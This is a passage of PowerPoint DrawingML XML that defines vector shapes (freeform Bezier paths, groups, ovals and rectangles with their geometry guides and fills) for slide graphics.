                        <a:pt x="68" y="19"/>
                        <a:pt x="28" y="28"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="36"/>
                        <a:pt x="2" y="42"/>
                        <a:pt x="1" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="55"/>
                        <a:pt x="0" y="135"/>
                        <a:pt x="1" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="163"/>
                        <a:pt x="25" y="165"/>
                        <a:pt x="36" y="156"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="153"/>
                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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80" name="Freeform 426">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758ACA88-6244-4BE0-A1EE-266095A0165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2089" y="1378"/>
                  <a:ext cx="119" cy="71"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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81" name="Oval 427">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D83548-0724-45E9-BD96-CF7372E6FE86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gray">
                <a:xfrm flipH="1">
                  <a:off x="2069" y="1129"/>
                  <a:ext cx="105" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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57" name="Group 428">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68535002-3A12-421D-BB6A-D898105C2968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flipH="1">
                <a:off x="1722" y="2789"/>
                <a:ext cx="866" cy="461"/>
                <a:chOff x="790" y="1889"/>
                <a:chExt cx="866" cy="461"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1866" name="Freeform 429">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA094100-1582-48F8-8FEE-518034FB992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625" y="1949"/>
                  <a:ext cx="31" cy="234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67" name="Freeform 430">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4036BC4-9B8A-447B-B01E-7948B244220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592" y="1949"/>
                  <a:ext cx="33" cy="234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68" name="Freeform 431">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A28B3B-CD37-4F5E-A3E5-F76B2FF0CC2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973" y="2116"/>
                  <a:ext cx="34" cy="234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4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69" name="Freeform 432">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80065672-E37A-41D2-BCDB-58EDF1E6EAC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007" y="2116"/>
                  <a:ext cx="30" cy="234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70" name="Freeform 433">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CFD3EC8-282B-4205-B774-7B676557D55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790" y="2066"/>
                  <a:ext cx="33" cy="234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71" name="Freeform 434">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C476E41-5176-4D2A-8399-50AADBABFED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823" y="2066"/>
                  <a:ext cx="31" cy="234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72" name="Freeform 435">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200FBA0A-03B0-42A5-AA2D-DAE4AED99B7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406" y="1902"/>
                  <a:ext cx="31" cy="234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4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73" name="Freeform 436">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A968347B-498D-413A-8509-90BBE926947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437" y="1902"/>
                  <a:ext cx="33" cy="234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74" name="Freeform 437">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368D7DFE-5EA9-416D-9BAE-D1D4E5AF666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007" y="1949"/>
                  <a:ext cx="649" cy="207"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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75" name="Freeform 438">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FA58943-8AC9-43FA-845B-05CF933AC3E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790" y="2066"/>
                  <a:ext cx="217" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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76" name="Freeform 439">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6EC3A42-5530-4A96-9F18-B9DDB556142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790" y="1889"/>
                  <a:ext cx="866" cy="236"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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58" name="Group 440">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{524C6BEC-FD70-468E-88E4-C538236574C0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2020" y="2756"/>
                <a:ext cx="270" cy="180"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1859" name="Freeform 441">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1541AB94-4A1C-478A-A34A-86EC2FEEC1D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859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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60" name="Freeform 442">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A61C4A5-3273-47C6-9CE8-27942D87684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2045" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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61" name="Freeform 443">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B214302D-6B34-4418-9900-B769F03B5CC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859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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62" name="Freeform 444">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD3FE43-1075-4D7B-BFF8-AD10D1AB36D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912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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63" name="Freeform 445">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D0CA272-3602-4D4A-8871-F320CC450D8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859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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64" name="Freeform 446">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABB1DCBD-5BD7-48EB-BFB4-B312C54C236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2045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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65" name="Freeform 447">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C4BBF1-48B1-400B-99DC-A80B57A17D7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859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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21" name="Group 448">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5081A36-B813-46CF-BAB4-9AA81FDE00C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flipH="1">
              <a:off x="8187230" y="3123395"/>
              <a:ext cx="285750" cy="285750"/>
              <a:chOff x="562" y="1822"/>
              <a:chExt cx="318" cy="318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1851" name="Rectangle 449">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14870598-7050-4CBF-BA26-3F7438F6F4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gray">
              <a:xfrm>
                <a:off x="840" y="2100"/>
                <a:ext cx="40" cy="40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52" name="Rectangle 450">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EAE85E0-F2B2-4E05-AF7E-CC6C9D0C00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gray">
              <a:xfrm>
                <a:off x="759" y="2019"/>
                <a:ext cx="71" cy="71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853" name="Group 451">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAE44A12-E6C7-4E15-8FAE-F0C2D292BE83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562" y="1822"/>
                <a:ext cx="187" cy="187"/>
                <a:chOff x="-12610" y="18860"/>
                <a:chExt cx="330" cy="331"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1854" name="Rectangle 452">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8534E6D7-5FFE-4E02-A4E6-979D2323FABA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gray">
                <a:xfrm>
                  <a:off x="-12610" y="18860"/>
                  <a:ext cx="330" cy="331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1B171B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55" name="Freeform 453">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4D3352-DC4F-4DD4-BF16-DC07E0E6800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gray">
                <a:xfrm>
                  <a:off x="-12535" y="18898"/>
                  <a:ext cx="182" cy="255"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 77"/>
                    <a:gd name="T1" fmla="*/ 47 h 108"/>
                    <a:gd name="T2" fmla="*/ 62 w 77"/>
                    <a:gd name="T3" fmla="*/ 23 h 108"/>
                    <a:gd name="T4" fmla="*/ 38 w 77"/>
                    <a:gd name="T5" fmla="*/ 0 h 108"/>
                    <a:gd name="T6" fmla="*/ 14 w 77"/>
                    <a:gd name="T7" fmla="*/ 23 h 108"/>
                    <a:gd name="T8" fmla="*/ 38 w 77"/>
                    <a:gd name="T9" fmla="*/ 47 h 108"/>
                    <a:gd name="T10" fmla="*/ 77 w 77"/>
                    <a:gd name="T11" fmla="*/ 61 h 108"/>
                    <a:gd name="T12" fmla="*/ 71 w 77"/>
                    <a:gd name="T13" fmla="*/ 54 h 108"/>
                    <a:gd name="T14" fmla="*/ 5 w 77"/>
                    <a:gd name="T15" fmla="*/ 54 h 108"/>
                    <a:gd name="T16" fmla="*/ 0 w 77"/>
                    <a:gd name="T17" fmla="*/ 61 h 108"/>
                    <a:gd name="T18" fmla="*/ 0 w 77"/>
                    <a:gd name="T19" fmla="*/ 101 h 108"/>
                    <a:gd name="T20" fmla="*/ 5 w 77"/>
                    <a:gd name="T21" fmla="*/ 108 h 108"/>
                    <a:gd name="T22" fmla="*/ 71 w 77"/>
                    <a:gd name="T23" fmla="*/ 108 h 108"/>
                    <a:gd name="T24" fmla="*/ 77 w 77"/>
                    <a:gd name="T25" fmla="*/ 101 h 108"/>
                    <a:gd name="T26" fmla="*/ 77 w 77"/>
                    <a:gd name="T27" fmla="*/ 6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7" h="108">
                      <a:moveTo>
                        <a:pt x="38" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="47"/>
                        <a:pt x="62" y="36"/>
                        <a:pt x="62" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="10"/>
                        <a:pt x="51" y="0"/>
                        <a:pt x="38" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="0"/>
                        <a:pt x="14" y="10"/>
                        <a:pt x="14" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="36"/>
